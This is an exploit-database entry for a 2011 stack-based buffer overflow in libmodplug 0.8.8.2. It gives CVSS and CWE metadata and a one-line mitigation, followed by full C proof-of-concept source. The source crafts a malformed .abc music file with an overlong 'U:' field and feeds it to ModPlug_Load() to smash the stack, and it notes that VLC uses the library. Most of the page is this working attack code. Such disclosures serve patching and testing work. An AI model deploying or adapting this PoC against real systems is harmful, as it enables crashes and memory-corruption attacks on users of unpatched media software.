libmodplug - exploit.company

vendor:

libmodplug

by:

epiphant

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: libmodplug

Affected Version From: 0.8.8.2

Affected Version To: 0.8.8.2

Patch Exists: YES

Related CWE: N/A

CPE: libmodplug

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: CentOS 5.6

2011

libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc

This exploit is for a stack-based buffer overflow in libmodplug version 0.8.8.2. It is triggered by a crafted .abc file, which when loaded by ModPlug_Load() causes a buffer overflow. VLC media player uses libmodplug.

Mitigation:

Upgrade to the latest version of libmodplug.

Source

Exploit-DB raw data:

#include <libmodplug/modplug.h>
#include <stdio.h>
#include <string.h>

/*
libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc

http://modplug-xmms.sourceforge.net/

by: epiphant

this exploits one of many overflows in load_abc.cpp lol

vlc media player uses libmodplug

greets: defrost, babi, ming_wisher, emel1a, a.v., krs

date: 28 april 2011

tested on: centos 5.6
*/

int main(void)
{
  char test[512] = "X: 1\nU: ";
  unsigned int i;

  i = strlen(test);
  while (i < 278)
    test[i++] = 'Q';
  test[i++] = '1' + 32;
  test[i++] = '3';
  test[i++] = '3';
  test[i++] = '4';
  while (i < 286)
    test[i++] = 'A';
  test[i++] = '\n';
  test[i] = '\0';

  strcat(test, "T: Here Without You (Transcribed by: Bungee)\n");
  strcat(test, "Z: 3 Doors Down\n");
  strcat(test, "L: 1/4\n");
  strcat(test, "Q: 108\n");
  strcat(test, "K: C\n\n");
  strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n");

  i = strlen(test);
  ModPlug_Load(test, i);

  return 0;
}